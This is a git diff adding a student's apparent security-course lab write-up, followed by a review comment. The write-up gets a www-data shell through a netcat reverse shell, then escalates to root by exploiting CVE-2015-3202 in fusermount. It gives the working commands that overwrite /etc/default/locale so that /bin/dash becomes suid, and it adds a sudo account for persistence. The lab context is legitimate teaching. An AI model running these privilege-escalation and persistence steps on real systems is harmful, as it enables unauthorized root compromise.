Diffstat (limited to 'CamilStaps-s4498062-Assignment-5/ex2')
-rw-r--r-- | CamilStaps-s4498062-Assignment-5/ex2 | 28 |
1 files changed, 28 insertions, 0 deletions
diff --git a/CamilStaps-s4498062-Assignment-5/ex2 b/CamilStaps-s4498062-Assignment-5/ex2 new file mode 100644 index 0000000..023e137 --- /dev/null +++ b/CamilStaps-s4498062-Assignment-5/ex2 
@@ -0,0 +1,28 @@ +a + There is not much to explain here.. we open a listening netcat in the first terminal and the command second terminal opens a connection to it from the server we should attack, and executes /bin/bash. + + We then have a shell for www-data in the first terminal. + +c + I used https://www.exploit-db.com/exploits/37089/ which exploits CVE-2015-3202. It exploits a bug in fusermount which allows us to overwrite some file with root rights. We then overwrite /etc/bash.bashrc or /etc/default/locale or so to point to a script in /tmp, in which we do something that we want to be done with root rights. I used chmod 4755 /bin/dash, as suggested there. Then next time root logs in (in the case of /etc/bash.bashrc) or some cron job running with root rights sources /etc/default/locale, the exploit is executed. You can them come back and find /bin/dash with u+s rights, so you can get root rights in that shell. + + I then created my own account (camil) with sudo rights so that I could clean up without losing root rights in case I would need it later. In particular, I removed the suid bit from /bin/dash so that others wouldn't find it and use it (e.g. find / -perm -u=s -type f 2>/dev/null) + + Concretely, the commands used were: + + $ printf "chmod 4755 /bin/dash" > /tmp/exploit + $ printf 755 /tmp/exploit + $ mkdir -p '/tmp/exploit||/tmp/exploit' + $ LIBMOUNT_MTAB=/etc/default/locale _FUSE_COMMFD=0 fusermount '/tmp/exploit||/tmp/exploit' + fusermount: failed to open /etc/fuse.conf: Permission denied + sending file descriptor: Socket operation on non-socket + $ cat /etc/default/locale + /dev/fuse /tmp/exploit||/tmp/exploit fuse rw,nosuid,nodev,user=www-data 0 0 + + When locale is sourced, /dev/fuse /tmp/exploit will be piped to /tmp/exploit, so the latter is executed. + + I had /etc/bash.bashrc changed as well since sometime on Saturday, but unfortunately root didn't login. 
I also found that using /etc/bash.bashrc isn't very stealthy, because if you're using bash as unprivileged user, you see: + + bash: /dev/fuse: Permission denied + chmod: changing permissions of `/bin/dash': Operation not permitted + |
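Review bot: the cleanup paragraph in part c only records removing the suid bit from /bin/dash, but the write-up also leaves /etc/default/locale overwritten (the `cat /etc/default/locale` output shows the injected fuse line still in place), /etc/bash.bashrc modified "since sometime on Saturday", and a new account "camil" with sudo rights; none of these are documented as restored or removed, so the text should either list those steps or state that they were intentionally left. A note on detection would also fit here: the write-up itself observes that the modified /etc/bash.bashrc produces a visible `bash: /dev/fuse: Permission denied` for every unprivileged bash user, and the mtab line in /etc/default/locale is equally visible to anyone reading that file, so both persistence points are easy to spot during a review of recently modified files in /etc. Minor style points: "You can them come back" should read "then", and the trailing "or so" in "or /etc/default/locale or so" is vague about which files were actually changed.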